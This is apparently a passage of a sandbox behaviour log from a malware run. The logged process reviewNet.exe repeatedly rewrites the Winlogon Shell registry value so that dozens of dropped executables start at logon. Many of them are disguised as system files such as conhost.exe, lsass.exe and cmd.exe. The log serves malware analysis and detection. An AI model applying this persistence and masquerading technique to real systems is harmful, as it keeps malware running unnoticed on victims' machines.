\"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\conhost.exe\", 
\"C:\\Users\\Admin\\Desktop\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All 
\"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", 
\"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\conhost.exe\", 
\"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\conhost.exe\", \"C:\\Users\\Admin\\Desktop\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\SDK\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Google\\Update\\Offline\\cmd.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\conhost.exe\", \"C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.Transactions.Bridge\\3.0.0.0__b03f5f7f11d50a3a\\CrackLauncher.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", 
\"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\conhost.exe\", \"C:\\Users\\Admin\\Desktop\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\SDK\\CrackLauncher.exe\", 
\"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Google\\Update\\Offline\\cmd.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\conhost.exe\", \"C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.Transactions.Bridge\\3.0.0.0__b03f5f7f11d50a3a\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\CrackLauncher.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\fr\\conhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AtomicHunter.exe\", \"C:\\Program Files\\Internet Explorer\\ja-JP\\lsass.exe\", \"C:\\Users\\Admin\\wininit.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\reviewNet.exe\", \"C:\\Users\\All Users\\Application Data\\cmd.exe\", \"C:\\ComsurrogateServerdll\\cmd.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All 
Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All 
Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All 
Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\conhost.exe\", \"C:\\Users\\Admin\\Desktop\\conhost.exe\"" reviewNet.exe Set value (str) 
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\cmd.exe\", 
\"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\conhost.exe\", \"C:\\Users\\Admin\\Desktop\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", 